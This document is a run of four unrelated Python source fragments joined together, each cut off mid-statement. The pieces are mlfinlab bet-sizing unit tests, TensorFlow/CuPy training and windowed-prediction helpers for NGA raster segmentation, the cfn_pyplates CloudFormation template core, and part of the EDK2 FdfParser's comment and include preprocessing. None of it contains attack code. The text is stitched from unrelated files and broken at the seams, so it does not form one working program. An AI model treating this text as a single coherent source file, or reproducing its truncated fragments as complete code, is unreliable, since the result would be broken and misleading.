most_likely_parameters(test_results) mock_likely_parameters.return_value = test_params test_fit = [test_params[key] for key in ['mu_1', 'mu_2', 'sigma_1', 'sigma_2', 'p_1']] events_active['bet_size'] = events_active['c_t'].apply(lambda c: single_bet_size_mixed(c, test_fit)) # Evaluate. df_bet = bet_size_reserve(df_events['t1'], df_events['side'], fit_runs=25) self.assertTrue(events_active.equals(df_bet)) @patch('mlfinlab.bet_sizing.bet_sizing.most_likely_parameters') def test_bet_size_reserve_return_params(self, mock_likely_parameters): """ Tests for successful execution of 'bet_size_reserve' using return_parameters=True. Function 'most_likely_parameters' needs to be patched because the 'M2N.mp_fit' method makes use of random numbers. """ # Setup the test DataFrame. np.random.seed(0) sample_size = 500 start_date = dt.datetime(2000, 1, 1) date_step = dt.timedelta(days=1) dates = np.array([start_date + i*date_step for i in range(sample_size)]) shift_dt = np.array([dt.timedelta(days=d) for d in np.random.uniform(1., 20., sample_size)]) dates_shifted = dates + shift_dt time_1 = pd.Series(data=dates_shifted, index=dates) df_events = time_1.to_frame() df_events = df_events.rename(columns={0: 't1'}) df_events['p'] = np.random.uniform(0.0, 1.0, sample_size) df_events = df_events[['t1', 'p']] df_events['side'] = df_events['p'].apply(lambda x: 1 if x >= 0.5 else -1) # Calculate the correct results. events_active = get_concurrent_sides(df_events['t1'], df_events['side']) events_active['c_t'] = events_active['active_long'] - events_active['active_short'] central_moments = [moment(events_active['c_t'].to_numpy(), moment=i) for i in range(1, 6)] raw_moments = raw_moment(central_moments=central_moments, dist_mean=events_active['c_t'].mean()) m2n_test = M2N(raw_moments, epsilon=1e-5, factor=5, n_runs=25, variant=2, max_iter=10_000, num_workers=1) test_results = m2n_test.mp_fit() test_params = most_likely_parameters(test_results) mock_likely_parameters.return_value = test_params test_fit = [test_params[key] for key in ['mu_1', 'mu_2', 'sigma_1', 'sigma_2', 'p_1']] events_active['bet_size'] = events_active['c_t'].apply(lambda c: single_bet_size_mixed(c, test_fit)) # Evaluate. eval_events, eval_params = bet_size_reserve(df_events['t1'], df_events['side'], fit_runs=25, return_parameters=True) self.assertEqual(test_params, eval_params) self.assertTrue(events_active.equals(eval_events)) class TestConfirmAndCastToDf(unittest.TestCase): """ Tests the 'confirm_and_cast_to_df' function. """ def test_cast_to_df_all_series(self): """ Tests for successful execution of 'confirm_and_cast_to_df' when all dictionary values are pandas.Series. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) events_test = pd.DataFrame(data=[[25, 55, 75.50, 80.00], [35, 55, 76.90, 75.00], [45, 55, 74.10, 72.50], [40, 55, 67.75, 65.00], [30, 55, 62.00, 70.80]], columns=['pos', 'max_pos', 'm_p', 'f'], index=dates_test) d_events = {col: events_test[col] for col in list(events_test.columns)} # Evaluate. df_results = confirm_and_cast_to_df(d_events) self.assertTrue(events_test.equals(df_results)) def test_cast_to_df_one_series(self): """ Tests for successful execution of 'confirm_and_cast_to_df' when only one of the dictionary values are a pandas.Series. """ # Setup the test DataFrame. dates_test = np.array([dt.datetime(2000, 1, 1) + i * dt.timedelta(days=1) for i in range(5)]) max_pos, market_price, forecast_price = 55, 75.00, 80.00 events_test = pd.DataFrame(data=[[25, max_pos, market_price, forecast_price], [35, max_pos, market_price, forecast_price], [45, max_pos, market_price, forecast_price], [40, max_pos, market_price, forecast_price], [30, max_pos, market_price, forecast_price]], columns=['pos', 'max_pos', 'm_p', 'f'], index=dates_test) d_events = {'pos': events_test['pos'], 'max_pos': max_pos, 'm_p': market_price, 'f': forecast_price} # Evaluate. df_results = confirm_and_cast_to_df(d_events) self.assertTrue(np.allclose(events_test.to_numpy(), df_results.to_numpy(), 1e-9)) def test_cast_to_df_no_series(self): """ Tests for successful execution of 'confirm_and_cast_to_df' when none of the dictionary values are a pandas.Series. """ # Setup the test DataFrame. pos, max_pos, market_price, forecast_price = 35, 55, 75.00, 80.00 events_test = pd.DataFrame(data=[[pos, max_pos, market_price, forecast_price]], columns=['pos', 'max_pos', 'm_p', 'f']) d_events = {'pos': pos, 'max_pos': max_pos, 'm_p': market_price, 'f': forecast_price} # Evaluate. df_results = confirm_and_cast_to_df(d_events) self.assertTrue(np.allclose(events_test.to_numpy(), df_results.to_numpy(), 1e-9)) class TestGetConcurrentSides(unittest.TestCase): """ Tests the function 'get_concurrent_sides' for successful operation. """ def test_get_concurrent_sides_default(self): """ Tests for the successful execution of 'get_concurrent_sides'. Since there are no options or branches, there are no additional test cases beyond default. """ # Setup the test DataFrame. np.random.seed(0) sample_size = 100 start_date = dt.datetime(2000, 1, 1) date_step = dt.timedelta(days=1) dates = np.array([start_date + i*date_step for i in range(sample_size)]) shift_dt = np.array([dt.timedelta(days=d) for d in np.random.uniform(1., 20., sample_size)]) dates_shifted = dates + shift_dt time_1 = pd.Series(data=dates_shifted, index=dates) df_events = time_1.to_frame() df_events = df_events.rename(columns={0: 't1'}) df_events['p'] = np.random.uniform(0.0, 1.0, sample_size) df_events = df_events[['t1', 'p']] df_events['side'] = df_events['p'].apply(lambda x: 1 if x >= 0.5 else -1) # Calculate correct result. events_test = df_events.copy() events_test['active_long'] = 0 events_test['active_short'] = 0 for idx in events_test.index: df_long_active_idx = set(events_test[(events_test.index <= idx) & (events_test['t1'] > idx) \ & (events_test['side'] > 0)].index) events_test.loc[idx,
# -------------------------------------------------------------------------- # Core functions to train on NGA data. # -------------------------------------------------------------------------- import gc # clean garbage collection import glob # get global files from directory import random # for random integers from tqdm import tqdm # for progress bar import numpy as np # for arrays modifications import cupy as cp # for arrays modifications import tensorflow as tf # deep learning framework import scipy.signal # for postprocessing import math # for math calculations import rasterio as rio # read rasters # Has a bug and will be included when bug is fixed. # from cuml.dask.preprocessing import OneHotEncoder, LabelBinarizer # For generating one-hot encoder labels from datetime import datetime from tensorflow.keras.utils import to_categorical from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping from tensorflow.keras.callbacks import TensorBoard, CSVLogger # -------------------------------------------------------------------------- # Preprocessing Functions # -------------------------------------------------------------------------- def image_normalize(img, axis=(0, 1), c=1e-8): """ Normalize to zero mean and unit standard deviation along the given axis. Args: img (numpy or cupy): array (w, h, c) axis (integer tuple): into or tuple of width and height axis c (float): epsilon to bound given std value Return: Normalize single image ---------- Example ---------- image_normalize(arr, axis=(0, 1), c=1e-8) """ return (img - img.mean(axis)) / (img.std(axis) + c) def batch_normalize(batch, axis=(0, 1), c=1e-8): """ Normalize batch to zero mean and unit standard deviation. Args: img (numpy or cupy): array (n, w, h, c) axis (integer tuple): into or tuple of width and height axis c (float): epsilon to bound given std value Return: Normalize batch of images. ---------- Example ---------- batch_normalize(arr, axis=(0, 1), c=1e-8) """ # Note: for loop was proven to be faster than map method for b in range(batch.shape[0]): batch[b, :, :, :] = image_normalize(batch[b, :, :, :], axis=axis, c=c) return batch def gen_data_npz(fimg, img, mask, config, ntiles=1000, save_dir='train'): """ Extract random patches from cupy arrays. Args: fimg (str): data filename img (cupy.array): cupy array with data mask (cupy.array): cupy array with mask save_dir (str): directory to save output Return: save dataset to save_dir. ---------- Example ---------- gen_data_npz('image.tif', arr, mask, config, 8000, 'output') """ # set dimensions of the input image array, and get desired tile size z_dim, x_dim, y_dim = img.shape tsz = config.TILE_SIZE # placeholders for final datasets img_cp = cp.empty((ntiles, tsz, tsz, z_dim), dtype=cp.float32) mask_np = np.empty((ntiles, tsz, tsz, config.N_CLASSES), dtype=np.float16) # generate n number of tiles for i in tqdm(range(ntiles)): # Generate random integers from image xc = random.randint(0, x_dim - tsz) yc = random.randint(0, y_dim - tsz) # verify data is not on nodata region while cp.any( img[:, xc:(xc + tsz), yc:(yc + tsz)] == config.NODATA_VAL ): xc = random.randint(0, x_dim - tsz) yc = random.randint(0, y_dim - tsz) # change order to (h, w, c) tile_img = cp.moveaxis( img[:, xc:(xc + tsz), yc:(yc + tsz)], 0, -1 ) # TODO: replace with cuml One-hot encoder on future date when they fix # a bug on the output types. Using to_categorical in the meantime # Converts labels into one-hot encoding labels tile_mask = to_categorical( cp.asnumpy(mask[xc:(xc + tsz), yc:(yc + tsz)]), num_classes=config.N_CLASSES, dtype='float16' ) # maybe standardize here? depends on performance of single img vs batch img_cp[i, :, :, :] = tile_img mask_np[i, :, :, :] = tile_mask # normalize if config.NORMALIZE: img_cp = img_cp / config.normalization_factor # standardize if config.STANDARDIZE: img_cp = batch_normalize(img_cp, axis=(0, 1), c=1e-8) # save dataset into local disk, npz format with x and y labels cp.savez(f'{save_dir}/{fimg[:-4]}.npz', x=img_cp, y=cp.asarray(mask_np)) # -------------------------------------------------------------------------- # Training Functions # -------------------------------------------------------------------------- def get_tensorslices(data_dir='', img_id='x', label_id='y'): """ Getting tensor slices from disk. Args: data_dir (str): directory where data resides img_id (str): object id from npz file to get data from label_id (str): object id from npz file to get labels from Return: get image and label datasets ---------- Example ---------- get_tensorslices(data_dir='images', img_id='x', label_id='y') """ # open files and generate training dataset images = np.array([]) labels = np.array([]) # read all data files from disk for f in glob.glob(f'{data_dir}/*'): with np.load(f) as data: # vstack image batches into memory if images.size: # if images has elements, vstack new batch images = np.vstack([images, data[img_id]]) else: # if images empty, images equals new batch images = data[img_id] # vstack label batches into memory if labels.size: # if labels has elements, vstack new batch labels = np.vstack([labels, data[label_id]]) else: # if labels empty, images equals new batch labels = data[label_id] return images, labels def data_augment(image, label): """ Augment data for semantic segmentation. Args: image (numpy.array): image numpy array label (numpy.array): image numpy array Return: augmented image and label ---------- Example ---------- data_augment(image, label) """ # Thanks to the dataset.prefetch(AUTO) statement in the next function # (below), this happens essentially for free on TPU. Data pipeline code # is executed on the CPU part of the TPU, TPU is computing gradients. randint = np.random.randint(1, 7) if randint == 1: # flip left and right image = tf.image.random_flip_left_right(image) label = tf.image.random_flip_left_right(label) elif randint == 2: # reverse second dimension image = tf.image.random_flip_up_down(image) label = tf.image.random_flip_up_down(label) elif randint == 3: # rotate 90 degrees image = tf.image.rot90(image, k=1) label = tf.image.rot90(label, k=1) elif randint == 4: # rotate 180 degrees image = tf.image.rot90(image, k=2) label = tf.image.rot90(label, k=2) elif randint == 5: # rotate 270 degrees image = tf.image.rot90(image, k=3) label = tf.image.rot90(label, k=3) return image, label def get_training_dataset(dataset, config, do_aug=False, drop_remainder=False): """ Return training dataset to feed tf.fit. Args: dataset (tf.dataset): tensorflow dataset config (Config): Config object with parameters do_aug (bool): perform augmentation on the fly? drop_remainder (bool): drop remaineder when value does not match batch Return: tf dataset for training ---------- Example ---------- get_tensorslices(data_dir='images', img_id='x', label_id='y') """ dataset = dataset.map(data_augment, num_parallel_calls=config.AUTOTUNE) dataset = dataset.repeat() dataset = dataset.shuffle(2048) dataset = dataset.batch(config.BATCH_SIZE, drop_remainder=drop_remainder) # prefetch next batch while training (autotune prefetch buffer size) dataset = dataset.prefetch(config.AUTOTUNE) return dataset def gen_callbacks(config, metadata): """ Generate tensorflow callbacks. Args: config (Config): object with configurations metadata (dict): directory with callback metadata values Return: list of callback functions ---------- Example ---------- gen_callbacks(config, metadata) """ callback_list = list() if 'TensorBoard' in config.CALLBACKS: # Generating tensorboard callbacks tensor = TensorBoard( log_dir=config.MODEL_SAVEDIR, write_graph=True, histogram_freq=metadata['history_freq'] ) callback_list.append(tensor) if 'CSVLogger' in config.CALLBACKS: # initialize model csv logger callback csv_outfile = config.MODEL_OUTPUT_NAME[:-3] + '_' + \ datetime.now().strftime("%Y%m%d-%H%M%S")+'.csv' csvlog = CSVLogger(csv_outfile, append=True, separator=';') callback_list.append(csvlog) if 'EarlyStopping' in config.CALLBACKS: # initialize model early stopping callback early_stop = EarlyStopping( patience=metadata['patience_earlystop'], monitor=metadata['monitor_earlystop'] ) callback_list.append(early_stop) if 'ModelCheckpoint' in config.CALLBACKS: # initialize model checkpoint callback checkpoint = ModelCheckpoint( filepath=config.MODEL_OUTPUT_NAME[:-3]+'_{epoch:02d}.h5', monitor=metadata['monitor_checkpoint'], save_best_only=metadata['save_best_only'], save_freq=metadata['save_freq'], verbose=1 ) callback_list.append(checkpoint) return callback_list # -------------------------------------------------------------------------- # Prediction Functions # -------------------------------------------------------------------------- def pad_image(img, target_size): """ Pad an image up to the target size. Args: img (numpy.arry): image array target_size (int): image target size Return: padded image array ---------- Example ---------- pad_image(img, target_size=256) """ rows_missing = target_size - img.shape[0] cols_missing = target_size - img.shape[1] padded_img = np.pad( img, ((0, rows_missing), (0, cols_missing), (0, 0)), 'constant' ) return padded_img def predict_windowing(x, model, config, spline): """ Predict scene using windowing mechanisms. Args: x (numpy.array): image array model (tf h5): image target size config (Config): spline (numpy.array): Return: prediction scene array probabilities ---------- Example ---------- predict_windowing(x, model, config, spline) """ print("Entering windowing prediction", x.shape) img_height = x.shape[0] img_width = x.shape[1] n_channels = x.shape[2] # make extended img so that it contains integer number of patches npatches_vertical = math.ceil(img_height / config.TILE_SIZE) npatches_horizontal = math.ceil(img_width / config.TILE_SIZE) extended_height = config.TILE_SIZE * npatches_vertical extended_width = config.TILE_SIZE * npatches_horizontal ext_x = np.zeros( shape=(extended_height, extended_width, n_channels), dtype=np.float32 ) # fill extended image with mirrors: ext_x[:img_height, :img_width, :] = x for i in range(img_height, extended_height): ext_x[i, :, :] = ext_x[2 * img_height - i - 1, :, :] for j in range(img_width, extended_width): ext_x[:, j, :] = ext_x[:, 2 * img_width - j - 1, :] # now we assemble all patches in one array patches_list = [] # do vstack later instead of list for i in range(0, npatches_vertical): for j in range(0, npatches_horizontal): x0, x1 = i * config.TILE_SIZE, (i + 1) * config.TILE_SIZE y0, y1 = j * config.TILE_SIZE, (j + 1) * config.TILE_SIZE patches_list.append(ext_x[x0:x1, y0:y1, :]) patches_array = np.asarray(patches_list) # standardize
<filename>cfn_pyplates/core.py # Copyright (c) 2013 MetaMetrics, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. '''Core functionality and all required components of a working CFN template. These are all available without preamble in a pyplate's global namespace. ''' import inspect import json from ordereddict import OrderedDict from cfn_pyplates.exceptions import AddRemoveError aws_template_format_version = '2010-09-09' __all__ = [ 'JSONableDict', 'CloudFormationTemplate', 'Parameters', 'Mappings', 'Resources', 'Outputs', 'Properties', 'Mapping', 'Resource', 'Parameter', 'Output', 'DependsOn', 'DeletionPolicy', 'UpdatePolicy', 'Metadata', 'ec2_tags', ] class JSONableDict(OrderedDict): '''A dictionary that knows how to turn itself into JSON Args: update_dict: A dictionary of values for prepopulating the JSONableDict at instantiation name: An optional name. If left out, the class's (or subclass's) name will be used. The most common use-case of any JSON entry in a CFN Template is the ``{"Name": {"Key1": "Value1", "Key2": Value2"} }`` pattern. The significance of a JSONableDict's subclass name, or explicitly passing a 'name' argument is accomodating this pattern. All JSONableDicts have names. To create the pyplate equivalent of the above JSON, contruct a JSONableDict accordingly:: JSONableDict({'Key1': 'Value1', 'Key2', 'Value2'}, 'Name'}) Based on :class:`ordereddict.OrderedDict`, the order of keys is significant. ''' def __init__(self, update_dict=None, name=None): super(JSONableDict, self).__init__() self._name = name if update_dict: self.update(update_dict) def __unicode__(self): # Indenting to keep things readable # Trailing whitespace after commas removed # (The space after colons is cool, though. He can stay.) return unicode(self.json) def __str__(self): return unicode(self).encode('utf-8') def __setattr__(self, name, value): # This makes it simple to bind child dictionaries to an # attribute while still making sure they wind up in the output # dictionary, see usage example in CloudFormationTemplate init if isinstance(value, JSONableDict): self.add(value) super(JSONableDict, self).__setattr__(name, value) def __delattr__(self, name): attr = getattr(self, name) if isinstance(attr, JSONableDict): try: self.remove(attr) except KeyError: # Key already deleted, somehow. # Everything's fine here now. How're you? pass super(JSONableDict, self).__delattr__(name) def _get_name(self): if self._name is not None: return self._name else: # Default to the class name if _name is None return self.__class__.__name__ def _set_name(self, name): self._name = name def _del_name(self): self._name = None name = property(_get_name, _set_name, _del_name) '''Accessor to the ``name`` internals; Allows getting, settings, and deleting the name ''' @property def json(self): 'Accessor to the canonical JSON representation of a JSONableDict' return self.to_json(indent=2, separators=(',', ': ')) def add(self, child): '''Add a child node Args: child: An instance of JSONableDict Raises: AddRemoveError: :exc:`cfn_pyplates.exceptions.AddRemoveError` ''' if isinstance(child, JSONableDict): self.update( {child.name: child} ) else: raise AddRemoveError return child def remove(self, child): '''Remove a child node Args: child: An instance of JSONableDict Raises: AddRemoveError: :exc:`cfn_pyplates.exceptions.AddRemoveError` ''' if isinstance(child, JSONableDict): del(self[child.name]) else: raise AddRemoveError def to_json(self, *args, **kwargs): '''Thin wrapper around the :func:`json.dumps` method. Allows for passing any arguments that json.dumps would accept to completely customize the JSON output if desired. ''' return json.dumps(self, *args, **kwargs) class CloudFormationTemplate(JSONableDict): '''The root element of a CloudFormation template [#cfn-template]_ Takes an option description string in the constructor Comes pre-loaded with all the subelements CloudFormation can stand: - Parameters - Mappings - Resources - Outputs ''' def __init__(self, description=None): super(CloudFormationTemplate, self).__init__({ 'AWSTemplateFormatVersion': aws_template_format_version, }) if description: self.update({ 'Description': description, }) # Tack on all the base template elements that a CF template can handle # at easy-to-reach parameters self.parameters = Parameters() self.mappings = Mappings() self.resources = Resources() self.outputs = Outputs() def __unicode__(self): # Before outputting to json, remove empty elements def predicate(obj): '''getmembers predicate to find empty JSONableDict attributes attached to self CloudFormation doesn't like empty mappings for these top-level attributes, so any falsey JSONableDict that's at attribute on the CloudFormationTemplate instance needs to get removed ''' if isinstance(obj, JSONableDict) and not obj: return True for attr, mapping in inspect.getmembers(self, predicate): delattr(self, attr) return super(CloudFormationTemplate, self).__unicode__() class Metadatums(JSONableDict): '''The base Container for metadatums used at stack creation [#cfn-metadata]_ Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate` ''' pass # CloudFormationTemplate base elements class Parameters(JSONableDict): '''The base Container for parameters used at stack creation [#cfn-parameters]_ Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate` ''' pass class Mappings(JSONableDict): '''The base Container for stack option mappings [#cfn-mappings]_ .. note:: Since most lookups can be done inside a pyplate using python, this is normally unused. Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate` ''' pass class Resources(JSONableDict): '''The base Container for stack resources [#cfn-resources]_ Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate` ''' pass class Outputs(JSONableDict): '''The base Container for stack outputs [#cfn-outputs]_ Attached to a :class:`cfn_pyplates.core.CloudFormationTemplate` ''' pass # Other 'named' JSONableDicts class Properties(JSONableDict): '''A properties mapping [#cfn-properties]_, used by various CFN declarations Can be found in: - :class:`cfn_pyplates.core.Parameters` - :class:`cfn_pyplates.core.Outputs` - :class:`cfn_pyplates.core.Resource` Properties will be most commonly found in Resources ''' pass class Resource(JSONableDict): '''A generic CFN Resource [#cfn-resource-types]_ Used in the :class:`cfn_pyplates.core.Resources` container. All resources have a name, and most have a 'Type' and 'Properties' dict. Thus, this class takes those as arguments and makes a generic resource. The 'name' parameter must follow CFN's guidelines for naming [#cfn-resources]_ The 'type' parameter must be one of these: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-template-resource-type-ref.html The optional 'properties' parameter is a dictionary of properties as defined by the resource type, see documentation related to each resource type Args: name: The unique name of the resource to add type: The type of this resource properties: Optional properties mapping to apply to this resource, can be an instance of ``JSONableDict`` or just plain old ``dict`` attributes: Optional (on of 'DependsOn', 'DeletionPolicy', 'Metadata', 'UpdatePolicy' or a list of 2 or more) ''' def __init__(self, name, type, properties=None, attributes=[]): update_dict = {'Type': type} super(Resource, self).__init__(update_dict, name) if properties: try: # Assume we've got a JSONableDict self.add(properties) except AddRemoveError: # If not, coerce it self.add(Properties(properties)) if attributes: if self.__is_attribute(attributes): self.add(attributes) elif isinstance(attributes, list): for i in attributes: if isinstance(i, JSONableDict) and self.__is_attribute(i): self.add(i) def __is_attribute(self, attribute): """Is the Object a valid Resource Attribute? :param attribute: the object under test """ if isinstance(attribute, list): for i in attribute: self.__is_attribute(i) elif attribute.__class__.__name__ in ['Metadata', 'UpdatePolicy']: self.add(attribute) elif attribute.__class__.__name__ in ['DependsOn', 'DeletionPolicy']: self.update({attribute.__class__.__name__: attribute.value}) class Parameter(JSONableDict): '''A CFN Parameter [#cfn-parameters]_ Used in the :class:`cfn_pyplates.core.Parameters` container, a Parameter will be used when the template is processed by CloudFormation to prompt the user for any additional input. More information for Parameter options: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/parameters-section-structure.html Args: name: The unique name of the parameter to add type: The type of this parameter properties: Optional properties mapping to apply to this parameter ''' def __init__(self, name, type, properties=None): # Just like a Resource, except the properties go in the # update_dict, not a named key. update_dict = {'Type': type} if properties is not None: update_dict.update(properties) super(Parameter, self).__init__(update_dict, name) class Mapping(JSONableDict): '''A CFN Mapping [#cfn-mappings]_ Used in the :class:`cfn_pyplates.core.Mappings` container, a Mapping defines mappings used within the Cloudformation template and is not the same as a PyPlates options mapping. More information for mapping options: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/concept-mappings.html Args: name: The unique name of the mapping to add mappings: The dictionary of mappings ''' def __init__(self, name, mappings=None): update_dict = {} if mappings is not None: update_dict.update(mappings) super(Mapping, self).__init__(update_dict, name) class Output(JSONableDict): '''A CFN Output [#cfn-outputs]_ Used in the :class:`cfn_pyplates.core.Outputs`, an Output entry describes a value to be shown when describe this stack using CFN API tools. More information for Output options can be found here: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/outputs-section-structure.html Args: name: The unique name of the output value: The value the output should return description: An optional description of this output ''' def __init__(self, name, value, description=None): update_dict = {'Value': value} if description is not None: update_dict['Description'] = description super(Output, self).__init__(update_dict, name) class Metadata(JSONableDict): '''A CFN Output [#cfn-outputs]_ Used in the :class:`cfn_pyplates.core.Resource`, The Metadata attribute enables you to associate structured data with a resource. By adding a Metadata attribute to a resource, you can
# Get the one char pass the char pointed to by the file buffer pointer # # @param self The object pointer # @retval Char Next char # def _NextChar(self): if self.CurrentOffsetWithinLine == len(self.Profile.FileLinesList[self.CurrentLineNumber - 1]) - 1: return self.Profile.FileLinesList[self.CurrentLineNumber][0] return self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine + 1] ## _SetCurrentCharValue() method # # Modify the value of current char # # @param self The object pointer # @param Value The new value of current char # def _SetCurrentCharValue(self, Value): self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine] = Value ## _CurrentLine() method # # Get the list that contains current line contents # # @param self The object pointer # @retval List current line contents # def _CurrentLine(self): return self.Profile.FileLinesList[self.CurrentLineNumber - 1] def _StringToList(self): self.Profile.FileLinesList = [list(s) for s in self.Profile.FileLinesList] if not self.Profile.FileLinesList: EdkLogger.error('FdfParser', FILE_READ_FAILURE, 'The file is empty!', File=self.FileName) self.Profile.FileLinesList[-1].append(' ') def _ReplaceFragment(self, StartPos, EndPos, Value = ' '): if StartPos[0] == EndPos[0]: Offset = StartPos[1] while Offset <= EndPos[1]: self.Profile.FileLinesList[StartPos[0]][Offset] = Value Offset += 1 return Offset = StartPos[1] while self.Profile.FileLinesList[StartPos[0]][Offset] not in CR_LB_SET: self.Profile.FileLinesList[StartPos[0]][Offset] = Value Offset += 1 Line = StartPos[0] while Line < EndPos[0]: Offset = 0 while self.Profile.FileLinesList[Line][Offset] not in CR_LB_SET: self.Profile.FileLinesList[Line][Offset] = Value Offset += 1 Line += 1 Offset = 0 while Offset <= EndPos[1]: self.Profile.FileLinesList[EndPos[0]][Offset] = Value Offset += 1 def _SetMacroValue(self, Macro, Value): if not self._CurSection: return MacroDict = {} if not self._MacroDict[self._CurSection[0], self._CurSection[1], self._CurSection[2]]: self._MacroDict[self._CurSection[0], self._CurSection[1], self._CurSection[2]] = MacroDict else: MacroDict = self._MacroDict[self._CurSection[0], self._CurSection[1], self._CurSection[2]] MacroDict[Macro] = Value def _GetMacroValue(self, Macro): # Highest priority if Macro in GlobalData.gCommandLineDefines: return GlobalData.gCommandLineDefines[Macro] if Macro in GlobalData.gGlobalDefines: return GlobalData.gGlobalDefines[Macro] if self._CurSection: MacroDict = self._MacroDict[ self._CurSection[0], self._CurSection[1], self._CurSection[2] ] if MacroDict and Macro in MacroDict: return MacroDict[Macro] # Lowest priority if Macro in GlobalData.gPlatformDefines: return GlobalData.gPlatformDefines[Macro] return None def _SectionHeaderParser(self, Section): # [Defines] # [FD.UiName]: use dummy instead if UI name is optional # [FV.UiName] # [Capsule.UiName] # [Rule]: don't take rule section into account, macro is not allowed in this section # [VTF.arch.UiName, arch] # [OptionRom.DriverName] self._CurSection = [] Section = Section.strip()[1:-1].upper().replace(' ', '').strip(TAB_SPLIT) ItemList = Section.split(TAB_SPLIT) Item = ItemList[0] if Item == '' or Item == 'RULE': return if Item == TAB_COMMON_DEFINES.upper(): self._CurSection = [TAB_COMMON, TAB_COMMON, TAB_COMMON] elif Item == 'VTF' and len(ItemList) == 3: UiName = ItemList[2] Pos = UiName.find(TAB_COMMA_SPLIT) if Pos != -1: UiName = UiName[:Pos] self._CurSection = ['VTF', UiName, ItemList[1]] elif len(ItemList) > 1: self._CurSection = [ItemList[0], ItemList[1], TAB_COMMON] elif len(ItemList) > 0: self._CurSection = [ItemList[0], 'DUMMY', TAB_COMMON] ## PreprocessFile() method # # Preprocess file contents, replace comments with spaces. # In the end, rewind the file buffer pointer to the beginning # BUGBUG: No !include statement processing contained in this procedure # !include statement should be expanded at the same FileLinesList[CurrentLineNumber - 1] # # @param self The object pointer # def PreprocessFile(self): self.Rewind() InComment = False DoubleSlashComment = False HashComment = False # HashComment in quoted string " " is ignored. InString = False while not self._EndOfFile(): if self._CurrentChar() == T_CHAR_DOUBLE_QUOTE and not InComment: InString = not InString # meet new line, then no longer in a comment for // and '#' if self._CurrentChar() == TAB_LINE_BREAK: self.CurrentLineNumber += 1 self.CurrentOffsetWithinLine = 0 if InComment and DoubleSlashComment: InComment = False DoubleSlashComment = False if InComment and HashComment: InComment = False HashComment = False # check for */ comment end elif InComment and not DoubleSlashComment and not HashComment and self._CurrentChar() == TAB_STAR and self._NextChar() == TAB_BACK_SLASH: self._SetCurrentCharValue(TAB_SPACE_SPLIT) self._GetOneChar() self._SetCurrentCharValue(TAB_SPACE_SPLIT) self._GetOneChar() InComment = False # set comments to spaces elif InComment: self._SetCurrentCharValue(TAB_SPACE_SPLIT) self._GetOneChar() # check for // comment elif self._CurrentChar() == TAB_BACK_SLASH and self._NextChar() == TAB_BACK_SLASH and not self._EndOfLine(): InComment = True DoubleSlashComment = True # check for '#' comment elif self._CurrentChar() == TAB_COMMENT_SPLIT and not self._EndOfLine() and not InString: InComment = True HashComment = True # check for /* comment start elif self._CurrentChar() == TAB_BACK_SLASH and self._NextChar() == TAB_STAR: self._SetCurrentCharValue(TAB_SPACE_SPLIT) self._GetOneChar() self._SetCurrentCharValue(TAB_SPACE_SPLIT) self._GetOneChar() InComment = True else: self._GetOneChar() # restore from ListOfList to ListOfString self.Profile.FileLinesList = ["".join(list) for list in self.Profile.FileLinesList] self.Rewind() ## PreprocessIncludeFile() method # # Preprocess file contents, replace !include statements with file contents. # In the end, rewind the file buffer pointer to the beginning # # @param self The object pointer # def PreprocessIncludeFile(self): # nested include support Processed = False MacroDict = {} while self._GetNextToken(): if self._Token == TAB_DEFINE: if not self._GetNextToken(): raise Warning.Expected("Macro name", self.FileName, self.CurrentLineNumber) Macro = self._Token if not self._IsToken(TAB_EQUAL_SPLIT): raise Warning.ExpectedEquals(self.FileName, self.CurrentLineNumber) Value = self._GetExpression() MacroDict[Macro] = Value elif self._Token == TAB_INCLUDE: Processed = True IncludeLine = self.CurrentLineNumber IncludeOffset = self.CurrentOffsetWithinLine - len(TAB_INCLUDE) if not self._GetNextToken(): raise Warning.Expected("include file name", self.FileName, self.CurrentLineNumber) IncFileName = self._Token PreIndex = 0 StartPos = IncFileName.find('$(', PreIndex) EndPos = IncFileName.find(')', StartPos+2) while StartPos != -1 and EndPos != -1: Macro = IncFileName[StartPos+2: EndPos] MacroVal = self._GetMacroValue(Macro) if not MacroVal: if Macro in MacroDict: MacroVal = MacroDict[Macro] if MacroVal is not None: IncFileName = IncFileName.replace('$(' + Macro + ')', MacroVal, 1) if MacroVal.find('$(') != -1: PreIndex = StartPos else: PreIndex = StartPos + len(MacroVal) else: raise Warning("The Macro %s is not defined" %Macro, self.FileName, self.CurrentLineNumber) StartPos = IncFileName.find('$(', PreIndex) EndPos = IncFileName.find(')', StartPos+2) IncludedFile = NormPath(IncFileName) # # First search the include file under the same directory as FDF file # IncludedFile1 = PathClass(IncludedFile, os.path.dirname(self.FileName)) ErrorCode = IncludedFile1.Validate()[0] if ErrorCode != 0: # # Then search the include file under the same directory as DSC file # PlatformDir = '' if GenFdsGlobalVariable.ActivePlatform: PlatformDir = GenFdsGlobalVariable.ActivePlatform.Dir elif GlobalData.gActivePlatform: PlatformDir = GlobalData.gActivePlatform.MetaFile.Dir IncludedFile1 = PathClass(IncludedFile, PlatformDir) ErrorCode = IncludedFile1.Validate()[0] if ErrorCode != 0: # # Also search file under the WORKSPACE directory # IncludedFile1 = PathClass(IncludedFile, GlobalData.gWorkspace) ErrorCode = IncludedFile1.Validate()[0] if ErrorCode != 0: raise Warning("The include file does not exist under below directories: \n%s\n%s\n%s\n"%(os.path.dirname(self.FileName), PlatformDir, GlobalData.gWorkspace), self.FileName, self.CurrentLineNumber) if not IsValidInclude (IncludedFile1.Path, self.CurrentLineNumber): raise Warning("The include file {0} is causing a include loop.\n".format (IncludedFile1.Path), self.FileName, 